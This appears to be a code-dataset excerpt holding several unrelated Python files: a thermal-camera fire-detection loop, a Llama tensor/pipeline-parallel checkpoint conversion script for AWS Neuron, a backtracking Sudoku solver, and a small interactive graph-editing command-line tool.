shutil.rmtree(DIR_NAME)\n\n\nlast_thermal_frame = None\nfire = False\nwhile 1:\n frame_count += 1\n fire = False\n\n pi_frame = picam2.capture_array(\"main\")\n frame_usb = thermalcamera.capture_array()\n add_frames_to_buffer(pi_frame, frame_usb)\n\n pi_frame = preprocess_pi_frame(pi_frame)\n\n pi_frame = bgsub.apply(pi_frame)\n pi_frame = cv2.dilate(pi_frame, np.ones((7, 7), np.uint8), iterations=2)\n pi_frame = cv2.erode(pi_frame, np.ones((7, 7), np.uint8), iterations=2)\n\n pi_frame, soups_rects = detect_soups(pi_frame)\n cv2.imshow('pi_frame3', pi_frame)\n\n thermal_frame = preprocess_thermal_frame(frame_usb)\n\n # check if thermal_frame changed since last frame\n 
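preprocess_thermal_frame above decodes the camera's 16-bit counts into degrees Celsius: drop the two low bits, divide by 16 (so one remaining count is 1/16 K), then subtract 273.15. One pixel worked through:

import numpy as np

raw = np.uint16(19081)                        # raw 16-bit count
kelvin = (raw >> 2).astype(np.float32) / 16   # 4770 / 16 = 298.125 K
celsius = kelvin - 273.15                     # ~24.98 degrees C
assert abs(celsius - 24.975) < 1e-3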
if np.array_equal(last_thermal_frame, thermal_frame):\n print('✋✋✋✋✋✋✋✋✋✋✋✋✋✋', end='\\r')\n continue\n last_thermal_frame = thermal_frame.copy()\n\n #  check if last_soup_timestamp is older than 10 seconds\n if (datetime.datetime.now() - last_soup_timestamp).total_seconds() > 5 and len(soup_min_t_deque) > 0:\n print('🗑️ 🗑️ 🗑️ 🗑️ 🗑️ 🗑️ 🗑️ 🗑️ Resetting soup deques ', end='\\n')\n\n soup_area_deque.clear()\n soup_t_deque.clear()\n soup_min_t_deque.clear()\n soup_avg_t_deque.clear()\n soup_delta_t_deque.clear()\n last_soup_timestamp = datetime.datetime.now()\n\n # calculate min and max values for the last 100 frames\n max_t_deque.append(thermal_frame.max())\n min_t_deque.append(thermal_frame.min())\n\n # remove soups_rects from thermal_frame\n soups_frames = []\n thermal_frame_without_soups = thermal_frame.copy()\n soups_frame = np.zeros(thermal_frame.shape, dtype=np.float32)\n for x, y, w, h in soups_rects:\n soup_frame = thermal_frame[y:y + h, x:x + w].copy()\n\n soup_mean_t = np.nanmean(soup_frame)\n soup_t_deque.append(soup_mean_t)\n\n soup_max_t = np.nanmax(soup_frame)\n soup_min_t = np.nanmin(soup_frame)\n soup_avg_t = np.nanmean(soup_frame)\n soup_avg_t_deque.append(soup_avg_t)\n soup_min_t_deque.append(soup_min_t)\n soup_delta_t = soup_max_t - soup_min_t\n soup_delta_t_deque.append(soup_delta_t)\n\n soup_delta_t_z_score = (soup_delta_t - np.nanmean(soup_delta_t_deque)) / np.nanstd(soup_delta_t_deque)\n soup_min_t_z_score = (soup_min_t - np.nanmean(soup_min_t_deque)) / np.nanstd(soup_min_t_deque)\n\n if ((soup_min_t_z_score > 4.5 or soup_min_t - np.nanmean(soup_min_t_deque) > 4) and len(soup_min_t_deque) > DEQUE_LEN / 2):\n fire = True\n short_timestamp = datetime.datetime.now().strftime(\"%H-%M-%S\")\n if soup_min_t - np.nanmean(soup_min_t_deque) > 4:\n short_timestamp += '_HOTTER'\n print(f'🔥🔥🔥🔥🔥🔥🔥🔥 min_t: {soup_min_t:.2f}, soup_avg_t {soup_avg_t:.2f}, soup_min_t_z_score: {soup_min_t_z_score:.2f} [{short_timestamp}]', )\n cv2.imwrite(f'XXX/frame_{short_timestamp}_{str(int(soup_min_t_z_score))}.png', cv2.applyColorMap(cv2.normalize(soup_frame, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U), cv2.COLORMAP_JET))\n\n # prepare and write small log file with this detection next to the image\n with open(f'XXX/frame_{short_timestamp}_{str(int(soup_min_t_z_score))}.txt', 'w') as f:\n f.write(f'queue_min_t: {np.nanmean(soup_min_t_deque):.2f}, queue_delta_t {np.nanmean(soup_delta_t_deque):.2f}, last_min_t_z_score: {last_soup_min_t_z_score:.2f}\\n')\n f.write(f'soup_min_t: {soup_min_t:.2f}, soup_delta_t {soup_delta_t:.2f}, soup_min_t_z_score: {soup_min_t_z_score:.2f}, soup_avg_t: {soup_avg_t:.2f}\\n')\n\n last_soup_min_t_z_score = soup_min_t_z_score\n\n thermal_frame_without_soups[y:y + h, x:x + w] = np.nan\n\n # paste soup_frame into soups_frame\n soups_frame[y:y + h, x:x + w] = soup_frame\n\n last_soup_timestamp = datetime.datetime.now()\n\n # calculate mean temperature of thermal_frame but filter out 0 values\n mean_t_deque.append(np.nanmean(thermal_frame_without_soups))\n\n # overlay frame on thermal image\n thermal_picture_colored = cv2.applyColorMap(cv2.normalize(thermal_frame, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U), cv2.COLORMAP_JET)\n frame = cv2.cvtColor(pi_frame, cv2.COLOR_GRAY2RGB)\n frame = cv2.addWeighted(frame, 0.6, thermal_picture_colored, 0.6, 0)\n if fire:\n # draw red circle in top right corner to indicate fire detection\n cv2.circle(frame, (frame.shape[1] - 20, 20), 12, (0, 0, 255), -1)\n\n cv2.imshow('frame', frame)\n\n # calculate FPS\n now = time.time()\n fps = 1 / (now - 
last_time)\n last_time = now\n print(f'fps: {fps:.2f}, soup_min_t: {np.nanmean(soup_min_t_deque):.2f}, soup_avg_t {np.nanmean(soup_avg_t_deque):.2f}', f'🍲 soup_min_t_z_score: {last_soup_min_t_z_score:.2f}' if len(soups_rects) > 0 else ' ', end='\\r')\n\n #  print O if no soups detected else 4, using one print statement\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\npicam2.stop()\ncv2.destroyAllWindows()\n\nsave_frame_buffers_to_disk()","repo_name":"BiCo-Digital/altin-thermal","sub_path":"experiments/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27394568529","text":"import argparse\nimport json\nimport os\n\nimport torch\nimport torch_xla.utils.serialization as xser\n\nfrom training_utils import create_partition\n\n\ndef merge_llama_tp_checkpoints(args):\n full_model = {}\n if args.kv_size_multiplier > 1:\n with open(args.config, \"r\") as f:\n config = json.load(f)\n q_heads = config[\"num_attention_heads\"]\n kv_heads = config[\"num_key_value_heads\"]\n head_dim = config[\"hidden_size\"] // q_heads\n\n for tp_rank in range(args.tp_size):\n for pp_rank in range(args.pp_size):\n if args.load_xser:\n partial_state = load_partial_xser(args, tp_rank, pp_rank)\n else:\n partial_state = load_partial_no_xser(args, tp_rank, pp_rank)\n if args.model_key is not None and args.model_key in partial_state:\n partial_state = partial_state[args.model_key]\n for name, param in partial_state.items():\n if \"qkv_proj\" in name:\n # qkv_proj would be a key if we are using the QKVLinear layer\n partition_dim = 0\n if name not in full_model:\n full_model[name] = []\n full_model[name].append(param)\n if tp_rank == (args.tp_size - 1):\n full_weight = torch.cat(full_model[name], dim=partition_dim)\n if \"weight_k\" in name or \"weight_v\" in name:\n # If kv_multiplier is set, the kv heads are repeated. 
So we need to\n # take only the first chunk\n full_model[name] = torch.chunk(full_weight, args.kv_size_multiplier)[0]\n else:\n # Since we do the replication of KV heads, the Q heads are placed as:\n # Q0Q1Q8Q9...Q2Q3Q10Q11...\n # Hence when creating the merged checkpoint, we need to bring the Q heads in order.\n q_weights = full_weight.view(q_heads, head_dim, -1)\n q_weights_shape = q_weights.size()\n q_weights = q_weights.view(\n -1, q_heads // (kv_heads * args.kv_size_multiplier), head_dim, q_weights_shape[-1]\n )\n weight_splits = []\n indicies = torch.arange(0, args.tp_size // kv_heads) * kv_heads\n for i in range(kv_heads):\n weight_splits.append(q_weights[indicies + i].view(-1, q_weights_shape[-1]))\n full_weight = torch.cat(weight_splits, dim=0)\n full_model[name] = full_weight\n elif (\n \"embed_tokens\" in name\n or \"q_proj\" in name\n or \"k_proj\" in name\n or \"v_proj\" in name\n or \"o_proj\" in name\n or \"down_proj\" in name\n or \"lm_head\" in name\n ):\n partition_dim = 1 if (\"o_proj\" in name or \"down_proj\" in name) else 0\n if name not in full_model:\n full_model[name] = []\n full_model[name].append(param)\n if tp_rank == (args.tp_size - 1):\n full_weight = torch.cat(full_model[name], dim=partition_dim)\n full_model[name] = full_weight\n elif \"gate_up_proj\" in name:\n partition_dim = 0\n dim_size = param.size()[partition_dim] // 2\n gate_proj_name = name.replace(\"gate_up_proj\", \"gate_proj\")\n up_proj_name = name.replace(\"gate_up_proj\", \"up_proj\")\n gate_proj_weight = param.narrow(partition_dim, 0, dim_size).detach().clone()\n up_proj_weight = param.narrow(partition_dim, dim_size, dim_size).detach().clone()\n if gate_proj_name not in full_model:\n full_model[gate_proj_name] = []\n if up_proj_name not in full_model:\n full_model[up_proj_name] = []\n full_model[gate_proj_name].append(gate_proj_weight)\n full_model[up_proj_name].append(up_proj_weight)\n if tp_rank == (args.tp_size - 1):\n full_gate_proj_weight = torch.cat(full_model[gate_proj_name], dim=partition_dim)\n full_up_proj_weight = torch.cat(full_model[up_proj_name], dim=partition_dim)\n full_model[gate_proj_name] = full_gate_proj_weight\n full_model[up_proj_name] = full_up_proj_weight\n else:\n if name not in full_model:\n full_model[name] = param\n return full_model\n\n\ndef translate_llama_full_state_dict_to_tp(\n full_state, tp_size, tp_rank, pp_size, pp_rank, partitions, kv_size_multiplier, config_json\n):\n partial_state = {}\n for name, full_p in full_state.items():\n ##################### PP Slice #########################################\n # Embedding only in first PP\n if pp_rank != 0 and \"embed_tokens\" in name:\n continue\n # LMhead and final layer norm only in last PP rank\n if pp_rank != pp_size - 1 and (\"lm_head\" in name or \"model.norm.weight\" in name):\n continue\n if \"layers\" in name:\n layer_idx = int(name.split(\".\")[2])\n pre_layer_cut = int(partitions[pp_rank - 1].split(\".\")[2]) if pp_rank > 0 else -10000000\n current_layer_cut = int(partitions[pp_rank].split(\".\")[2]) if pp_rank < pp_size - 1 else 10000000\n if layer_idx <= pre_layer_cut or layer_idx > current_layer_cut:\n continue\n\n ##################### TP Slice #########################################\n if (\"q_proj\" in name or \"k_proj\" in name or \"v_proj\" in name or \"qkv_proj\" in name) and kv_size_multiplier > 1:\n with open(config_json, \"r\") as f:\n config = json.load(f)\n q_heads = config[\"num_attention_heads\"]\n kv_heads = config[\"num_key_value_heads\"]\n head_dim = config[\"hidden_size\"] // 
q_heads\n if \"k_proj\" in name or \".v_proj\" in name or \"weight_k\" in name or \"weight_v\" in name:\n repeated_kv = full_p.repeat(kv_size_multiplier, 1)\n\n dim_size = repeated_kv.size()[0]\n assert dim_size % tp_size == 0, \"0th dim after KV replication is not divisible by tp_size\"\n partition_size = dim_size // tp_size\n with torch.no_grad():\n to_load = repeated_kv.narrow(0, tp_rank * partition_size, partition_size).detach().clone()\n # When kv_multiplier is greater than 1, it means we are using the qkv_linear layer.\n # Hence the key name needs to be adjusted.\n name = (\n \".\".join(name.split(\".\")[:-2])\n + \".qkv_proj.\"\n + (\"weight_k\" if \"weight_k\" in name or \"k_proj\" in name else \"weight_v\")\n )\n partial_state[name] = to_load\n else:\n # When GQAQKV linear with kv_multiplier is used, we need to reshuffle the order of Q heads so that\n # they interact with the right KV heads.\n q_weights = full_p.view(q_heads, head_dim, -1)\n q_weights_shape = q_weights.size()\n q_weights = q_weights.view(\n -1, q_heads // (kv_heads * kv_size_multiplier), head_dim, q_weights_shape[-1]\n )\n weight_splits = []\n indicies = torch.arange(0, kv_heads) * tp_size // kv_heads\n for i in range(tp_size // kv_heads):\n weight_splits.append(q_weights[indicies + i])\n q_weights = torch.cat(weight_splits, dim=0)\n with torch.no_grad():\n to_load = q_weights[tp_rank].view(-1, q_weights_shape[-1])\n name = \".\".join(name.split(\".\")[:-2]) + \".qkv_proj.weight_q\"\n print(name)\n partial_state[name] = to_load\n\n elif (\n \"embed_tokens\" in name\n or \"q_proj\" in name\n or \"k_proj\" in name\n or \"v_proj\" in name\n or \"o_proj\" in name\n or \"down_proj\" in name\n or \"lm_head\" in name\n ):\n # parallel embedding or ColumnParallelLinear, parallel on 0th dim\n # RowParallelLinear parallel on 1st dim\n partition_dim = 1 if (\"o_proj\" in name or \"down_proj\" in name) else 0\n dim_size = full_p.size()[partition_dim]\n assert dim_size % tp_size == 0, \"vocab size is not divisiable\"\n partition_size = dim_size // tp_size\n with torch.no_grad():\n to_load = full_p.narrow(partition_dim, tp_rank * partition_size, partition_size).detach().clone()\n partial_state[name] = to_load\n elif \"gate_proj\" in name or \"up_proj\" in name:\n # ColumnParallelLinear\n partition_dim = 0\n dim_size = full_p.size()[partition_dim]\n assert dim_size % tp_size == 0, \"vocab size is not divisiable\"\n partition_size = dim_size // tp_size\n with torch.no_grad():\n to_load = full_p.narrow(partition_dim, tp_rank * partition_size, partition_size).detach().clone()\n token = \"gate_proj\" if \"gate_proj\" in name else \"up_proj\"\n updated_name = name.replace(token, \"gate_up_proj\")\n if updated_name in partial_state:\n if token == \"gate_proj\":\n partial_state[updated_name] = torch.cat([to_load, partial_state[updated_name]], dim=0)\n else:\n partial_state[updated_name] = torch.cat([partial_state[updated_name], to_load], dim=0)\n else:\n partial_state[updated_name] = to_load\n else:\n # no TP\n partial_state[name] = full_p\n return partial_state\n\n\n# Save Load Entries\ndef load_full(args):\n full_state = torch.load(args.input_dir)\n return full_state\n\n\ndef load_partial_xser(args, tp_rank, pp_rank):\n load_dir = os.path.join(args.input_dir, \"tp_rank_{:02d}_pp_rank_{:02d}\".format(tp_rank, pp_rank))\n partial_state = xser.load(load_dir)\n return partial_state\n\n\ndef load_partial_no_xser(args, tp_rank, pp_rank):\n load_dir = os.path.join(args.input_dir, \"tp_rank_{:02d}_pp_rank_{:02d}\".format(tp_rank, pp_rank), 
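The tensor-parallel slicing above is narrow() along the partitioned dimension: rank r of tp_size ranks takes the contiguous block [r*d/tp_size, (r+1)*d/tp_size). A minimal round-trip check that the shards re-merge losslessly:

import torch

full = torch.arange(8).reshape(8, 1).float()  # 8 output rows
tp_size = 4
partition = full.size(0) // tp_size
shards = [full.narrow(0, r * partition, partition) for r in range(tp_size)]
assert torch.equal(torch.cat(shards, dim=0), full)  # concatenating shards recovers the full tensor
assert shards[2].flatten().tolist() == [4.0, 5.0]   # rank 2 owns rows 4 and 5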
\"checkpoint.pt\")\n partial_state = torch.load(load_dir)\n return partial_state\n\n\ndef save_full(args, full_model):\n save_path = args.output_dir\n os.makedirs(save_path, exist_ok=True)\n if os.path.isdir(save_path):\n save_path = os.path.join(save_path, \"checkpoint.pt\")\n print(f\"Saving full checkpoint to {save_path}\")\n torch.save(full_model, save_path)\n\n\ndef save_partial_xser(args, partial_state, tp_rank, pp_rank):\n save_dir = os.path.join(args.output_dir, \"tp_rank_{:02d}_pp_rank_{:02d}\".format(tp_rank, pp_rank))\n os.makedirs(args.output_dir, exist_ok=True)\n print(f\"Saving to {save_dir}\")\n xser.save(partial_state, save_dir)\n\n\ndef save_partial_no_xser(args, partial_state, tp_rank, pp_rank):\n save_dir = os.path.join(args.output_dir, \"tp_rank_{:02d}_pp_rank_{:02d}\".format(tp_rank, pp_rank))\n os.makedirs(save_dir, exist_ok=True)\n print(f\"Saving to {save_dir}\")\n torch.save(partial_state, os.path.join(save_dir, \"checkpoint.pt\"))\n\n\n# Convertion Entries\ndef convert_from_xser(args):\n for tp_rank in range(args.tp_size):\n for pp_rank in range(args.pp_size):\n partial_state = load_partial_xser(args, tp_rank, pp_rank)\n save_partial_no_xser(args, partial_state, tp_rank, pp_rank)\n\n\ndef convert_to_xser(args):\n for tp_rank in range(args.tp_size):\n for pp_rank in range(args.pp_size):\n partial_state = load_partial_no_xser(args, tp_rank, pp_rank)\n save_partial_xser(args, partial_state, tp_rank, pp_rank)\n\n\ndef convert_from_full_model(args):\n full_state = load_full(args)\n partitions = create_partition(args.n_layers, args.pp_size)\n print(f\"pipeline_cuts {partitions}\")\n if args.kv_size_multiplier > 1:\n assert args.config is not None, \"If kv_size_multipler is greater than 1, need to pass config.json\"\n for tp_rank in range(args.tp_size):\n for pp_rank in range(args.pp_size):\n partial_state = translate_llama_full_state_dict_to_tp(\n full_state,\n args.tp_size,\n tp_rank,\n args.pp_size,\n pp_rank,\n partitions,\n args.kv_size_multiplier,\n args.config,\n )\n if args.save_xser:\n save_partial_xser(args, partial_state, tp_rank, pp_rank)\n else:\n save_partial_no_xser(args, partial_state, tp_rank, pp_rank)\n\n\ndef convert_to_full_model(args):\n full_model = merge_llama_tp_checkpoints(args)\n save_full(args, full_model)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_dir\", type=str, required=True, help=\"Path to input model/weights\")\n parser.add_argument(\"--output_dir\", type=str, required=True, help=\"Path to save converted model/weights\")\n parser.add_argument(\n \"--model_key\", type=str, default=\"model\", help=\"Key of the model state dict in the checkpoint object\"\n )\n parser.add_argument(\"--tp_size\", type=int, default=1, help=\"Tensor Parallel degree for the model\")\n parser.add_argument(\"--pp_size\", type=int, default=1, help=\"Pipeline Parallel degree for the model\")\n parser.add_argument(\"--n_layers\", type=int, default=0, help=\"Number of Layers\")\n parser.add_argument(\"--load_xser\", type=bool, default=False, help=\"Load from xser saved checkpoints\")\n parser.add_argument(\"--save_xser\", type=bool, default=False, help=\"Save with xser\")\n parser.add_argument(\n \"--convert_from_xser\", action=\"store_true\", help=\"Convert xser saved checkpoint to normal torch checkpoint\"\n )\n parser.add_argument(\n \"--convert_to_xser\", action=\"store_true\", help=\"Convert normal torch checkpoint to xser checkpoint\"\n )\n parser.add_argument(\"--convert_from_full_model\", 
action=\"store_true\", help=\"Convert full model to sharded model\")\n parser.add_argument(\"--convert_to_full_model\", action=\"store_true\", help=\"Convert sharded model to full model\")\n parser.add_argument(\n \"--kv_size_multiplier\", type=int, default=1, help=\"Factor by which the KV heads were replicated\"\n )\n parser.add_argument(\"--config\", type=str, default=None, help=\"Config.json\")\n\n args, _ = parser.parse_known_args()\n if args.convert_from_full_model:\n convert_from_full_model(args)\n elif args.convert_to_full_model:\n convert_to_full_model(args)\n elif args.convert_from_xser:\n convert_from_xser(args)\n elif args.convert_to_xser:\n convert_to_xser(args)\n","repo_name":"aws-neuron/neuronx-distributed","sub_path":"examples/training/llama2/convert_checkpoints.py","file_name":"convert_checkpoints.py","file_ext":"py","file_size_in_byte":15263,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"51"} +{"seq_id":"4604918164","text":"import time\n\nboard = [ # Sudoku Board\n [9,0,0,0,0,0,5,1,0], # 1\n [0,7,0,0,8,0,0,0,9], # 2\n [5,0,0,1,0,9,2,7,8], # 3\n [2,5,0,0,0,7,8,0,1], # 4\n [1,0,0,0,5,0,0,0,0], # 5\n [3,0,0,0,9,0,0,0,0], # 6\n [0,0,0,3,1,5,0,4,0], # 7\n [0,0,0,0,0,0,0,0,0], # 8\n [7,1,4,0,2,0,0,8,0] # 9\n]\n \ndef displayBoard(board):\n \"\"\"\n prints the board\n :parameter board: 2d list of integers\n :return: None\n \"\"\"\n\n for i in range(len(board)): # rows\n if i % 3 == 0 and i != 0: # when i is divisible by 3 and when i is not 0\n print(\"-------------------------\") # horiontal lines\n\n for j in range(len(board[0])): # columns\n if j % 3 == 0 and j != 0: # when j is divisible by 3 and when j is not 0\n print(\" | \"+ ' ', end = '') # vertical lines (end = '' is used to not end with newline (\\n))\n\n if j == 8: # last value in row\n print(board[i][j])\n else:\n print(str(board[i][j]) + ' ', end = '') # str is so we can add the space\n\ndef findZero(board):\n \"\"\"\n finds a zero in the board\n :parameter board: partially complete board\n :return: (integer, integer) row column\n \"\"\"\n\n for row in range(len(board)):\n for column in range(len(board[0])):\n if board[row][column] == 0: \n return(row, column) # row, column\n\n return None # needed since otherwise wil return position of zero\n\ndef validNumber(board, number, position):\n \"\"\"\n checks if number is valid in board\n :parameter board: 2d list of integers\n :parameter number: integer\n :parameter position: position of number (row, column)\n :return: bool\n \"\"\"\n\n # First check row\n for i in range(9):\n if board[position[0]][i] == number and i != position[1]: # check if equal in row and not position we just entered number\n return False\n\n # Then check column\n for i in range(9):\n if board[i][position[1]] == number and i != position[0]: # check if equal in column and not position we just entered number\n return False\n\n # Finally, check square\n square_x = position[1] // 3 # floor division (will give 0, 1, or 2)\n square_y = position[0] // 3 # floor division (will give 0, 1, or 2)\n\n for i in range(square_y * 3, square_y * 3 + 3): # from beginning to end of square row\n for j in range(square_x * 3, square_x * 3 + 3): # from beginning to end of square column\n if board[i][j] == number and (i, j) != position:\n return False\n\n return True # if all 3 tests do not return false, return true since number is valid\n\ndef solver(board):\n \"\"\"\n solves sudoku board using backtracking\n :parameter board: 2d list of integers\n :return: solution\n 
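The box test in validNumber above maps a cell to its 3x3 square by floor division; for example, the cell at row 5, column 7 belongs to square (1, 2), which spans rows 3-5 and columns 6-8:

row, col = 5, 7
square_y, square_x = row // 3, col // 3       # -> (1, 2)
rows = range(square_y * 3, square_y * 3 + 3)  # rows 3, 4, 5
cols = range(square_x * 3, square_x * 3 + 3)  # cols 6, 7, 8
assert (square_y, square_x) == (1, 2)
assert list(rows) == [3, 4, 5] and list(cols) == [6, 7, 8]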
\"\"\"\n\n # Base case of recusion, checks if any zeroes are left\n find = findZero(board) # checks for zeroes\n if find != None: # found zero\n row, column = find # find is a tuple e.g. (x, y)\n else: # no zeroes left; find is none\n return True # board is done\n\n for number in range(1,10): # tries numbers 1 to 9\n if validNumber(board, number, (row, column)) is True: # if number valid\n board[row][column] = number # inserts number\n\n if solver(board) is True: # if no zeroes left\n return True # board is solved\n\n else: # zeroes found\n board[row][column] = 0 # board not solved, reset number to zero \n continue\n \n else: # if number not valid\n continue\n\nif __name__ == \"__main__\":\n print(\"Unsolved Board\")\n displayBoard(board)\n\n startTime = time.time()\n\n solver(board)\n\n elapsedTime = time.time() - startTime\n elapsedTime = str(round(elapsedTime, 4))\n\n print(\"\")\n print(\"Solved Board\")\n displayBoard(board)\n\n print(\"\")\n print(\"Time elapsed: \", elapsedTime, \" seconds\")\n","repo_name":"TimDemetriades/PythonSudokuSolver","sub_path":"SudokuSolver.py","file_name":"SudokuSolver.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"8272200499","text":"import os\r\nimport argparse\r\nfrom MathGraph import MathGraph\r\nfrom File import File\r\nfrom path import path\r\n\r\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files/Graphviz/bin/'\r\n\r\nparser = argparse.ArgumentParser(description = 'MathGraph')\r\nparser.add_argument('-r', '--read', dest = 'read', type = str, help = \"read the Graph\")\r\nparser.add_argument('-s', '--save', dest = 'save', type = str, help = \"save the Graph\")\r\nparser.add_argument('-n', '--new', dest = 'new', type = str, help = \"create new Graph\")\r\nparser.add_argument('-ade', '--addedge', dest = 'addedge', type = str, help = 'add a new edge')\r\nparser.add_argument('-adv', '--addvertex', dest = 'addvertex', type = str, help = 'add a new vertex')\r\nparser.add_argument('-dle', '--deleteedge', dest = 'deleteedge', type = str, help = 'delete an edge')\r\nparser.add_argument('-dlv', '--deletevertex', dest = 'deletevertex', type = str, help = 'delete a vertex')\r\nparser.add_argument('-sv', '--searchvertex', dest = 'searchvertex', type = str, help = 'search all the vertex on the Graph')\r\nparser.add_argument('-se', '--searchedge', dest = 'searchedge', type = str, help = 'search all the edges on the Graph')\r\nparser.add_argument('-sl', '--searchlatter', dest = 'searchlatter', type = str, help = 'search all the vertex the point can go to')\r\nparser.add_argument('-sbf', '--searchbefore', dest = 'searchbefore', type = str, help = 'search all the vertex that can go to the point')\r\nparser.add_argument('-spth', '--searchpath', dest = 'searchpath', type = str, help = 'search the path contains the point')\r\nargs = parser.parse_args()\r\n\r\nwhile True:\r\n action = input('请输入您的操作:')\r\n if action == 'read':\r\n fileName = input('请输入您的文件名:')\r\n g = MathGraph()\r\n print (fileName)\r\n g.read(fileName)\r\n g.turn(fileName)\r\n print(path(g))\r\n continue\r\n\r\n if action == 'save':\r\n fileName = input('请输入您的文件名:')\r\n g.save(fileName)\r\n break\r\n\r\n if action == 'new':\r\n fileName = input('请输入您的文件名:')\r\n file = File(fileName)\r\n file.create()\r\n g = MathGraph()\r\n print (fileName)\r\n continue\r\n\r\n if action == 'addedge':\r\n string = input('请输入您的边名或者节点名:')\r\n g.addEdge(string[0], string[1])\r\n continue\r\n\r\n if action == 
+{"seq_id":"8272200499","text":"import os\r\nimport argparse\r\nfrom MathGraph import MathGraph\r\nfrom File import File\r\nfrom path import path\r\n\r\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files/Graphviz/bin/'\r\n\r\nparser = argparse.ArgumentParser(description = 'MathGraph')\r\nparser.add_argument('-r', '--read', dest = 'read', type = str, help = \"read the Graph\")\r\nparser.add_argument('-s', '--save', dest = 'save', type = str, help = \"save the Graph\")\r\nparser.add_argument('-n', '--new', dest = 'new', type = str, help = \"create new Graph\")\r\nparser.add_argument('-ade', '--addedge', dest = 'addedge', type = str, help = 'add a new edge')\r\nparser.add_argument('-adv', '--addvertex', dest = 'addvertex', type = str, help = 'add a new vertex')\r\nparser.add_argument('-dle', '--deleteedge', dest = 'deleteedge', type = str, help = 'delete an edge')\r\nparser.add_argument('-dlv', '--deletevertex', dest = 'deletevertex', type = str, help = 'delete a vertex')\r\nparser.add_argument('-sv', '--searchvertex', dest = 'searchvertex', type = str, help = 'search all the vertex on the Graph')\r\nparser.add_argument('-se', '--searchedge', dest = 'searchedge', type = str, help = 'search all the edges on the Graph')\r\nparser.add_argument('-sl', '--searchlatter', dest = 'searchlatter', type = str, help = 'search all the vertex the point can go to')\r\nparser.add_argument('-sbf', '--searchbefore', dest = 'searchbefore', type = str, help = 'search all the vertex that can go to the point')\r\nparser.add_argument('-spth', '--searchpath', dest = 'searchpath', type = str, help = 'search the path contains the point')\r\nargs = parser.parse_args()\r\n\r\nwhile True:\r\n    action = input('Enter your command: ')\r\n    if action == 'read':\r\n        fileName = input('Enter the file name: ')\r\n        g = MathGraph()\r\n        print (fileName)\r\n        g.read(fileName)\r\n        g.turn(fileName)\r\n        print(path(g))\r\n        continue\r\n\r\n    if action == 'save':\r\n        fileName = input('Enter the file name: ')\r\n        g.save(fileName)\r\n        break\r\n\r\n    if action == 'new':\r\n        fileName = input('Enter the file name: ')\r\n        file = File(fileName)\r\n        file.create()\r\n        g = MathGraph()\r\n        print (fileName)\r\n        continue\r\n\r\n    if action == 'addedge':\r\n        string = input('Enter the edge or vertex name: ')\r\n        g.addEdge(string[0], string[1])\r\n        continue\r\n\r\n    if action == 'addvertex':\r\n        string = input('Enter the edge or vertex name: ')\r\n        g.addVertex(string)\r\n        continue\r\n\r\n    if action == 'deleteedge':\r\n        string = input('Enter the edge or vertex name: ')\r\n        if g.dict2[string[1]] in g.connection[g.dict2[string[0]]]:\r\n            g.connection[g.dict2[string[0]]].remove(g.dict2[string[1]])\r\n        else:\r\n            print('The edge does not exist')\r\n        continue\r\n\r\n    if action == 'deletevertex':\r\n        string = input('Enter the edge or vertex name: ')\r\n        if string in g.dict2:\r\n            del g.connection[g.dict2[string]]\r\n            for m in range(len(g.connection)):\r\n                for n in g.connection[m]:\r\n                    if g.dict2[string] in g.connection[m]:\r\n                        g.connection[m].remove(g.dict2[string])\r\n            g.dict1.pop(g.dict2[string])\r\n            print(g.dict1)\r\n            l1 = g.dict1.values()\r\n            print(l1)\r\n            l2 = list(range(len(g.dict1)))\r\n            print(l2)\r\n            g.dict1 = dict(zip(l2,l1))\r\n            print(g.dict1)\r\n            g.dict2 = dict(zip(l1,l2))\r\n            print(g.dict2)\r\n        else:\r\n            print('The vertex does not exist')\r\n        continue\r\n\r\n    if action == 'searchvertex':\r\n        fileName = input('Enter the file name: ')\r\n        f = MathGraph()\r\n        f.read(fileName)\r\n        print (f.dict2.keys())\r\n        continue\r\n\r\n    if action == 'searchedge':\r\n        fileName = input('Enter the file name: ')\r\n        f = MathGraph()\r\n        f.read(fileName)\r\n        l = []\r\n        for m in range(len(f.connection)):\r\n            for n in f.connection[m]:\r\n                l.append(f.dict1[m] + f.dict1[n])\r\n        print(l)\r\n        continue\r\n\r\n\r\n    if action == 'searchlatter':\r\n        string = input('Enter the edge or vertex name: ')\r\n        print (g.exists_path_to(g.dict2[string]))\r\n        continue\r\n\r\n    if action == 'searchbefore':\r\n        string = input('Enter the edge or vertex name: ')\r\n        v = []\r\n        for n in g.dict1:\r\n            if g.dict2[string] in g.exists_path_to(n):\r\n                v.append(g.dict1[n])\r\n        print (v)\r\n        continue\r\n\r\n    if action == 'searchpath':\r\n        string = input('Enter the edge or vertex name: ')\r\n        v = []\r\n        for n in g.dict1:\r\n            if g.dict2[string] in g.exists_path_to(n):\r\n                v.append(g.dict1[n])\r\n        print ('Successor vertices: ' + str(g.exists_path_to(g.dict2[string])) + '\\nPredecessor vertices: ' + str(v))\r\n        continue\r\n\r\n    else:\r\n        print ('Unknown command, please try again')\r\n        continue\r\n","repo_name":"TimeSea22/MathGraph","sub_path":"cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
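`MathGraph.exists_path_to` is imported from another module and not shown here; judging by how it is called above, it maps a vertex index to the collection of vertices reachable from it. A hypothetical re-implementation over the same `connection` adjacency lists, assuming that contract:

```python
from collections import deque

def exists_path_to(connection, start):
    # Breadth-first search: return every vertex index reachable from `start`
    # by following the adjacency lists in `connection`.
    seen, queue = set(), deque([start])
    while queue:
        v = queue.popleft()
        for w in connection[v]:
            if w not in seen:
                seen.add(w)
                queue.append(w)
    return seen
```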
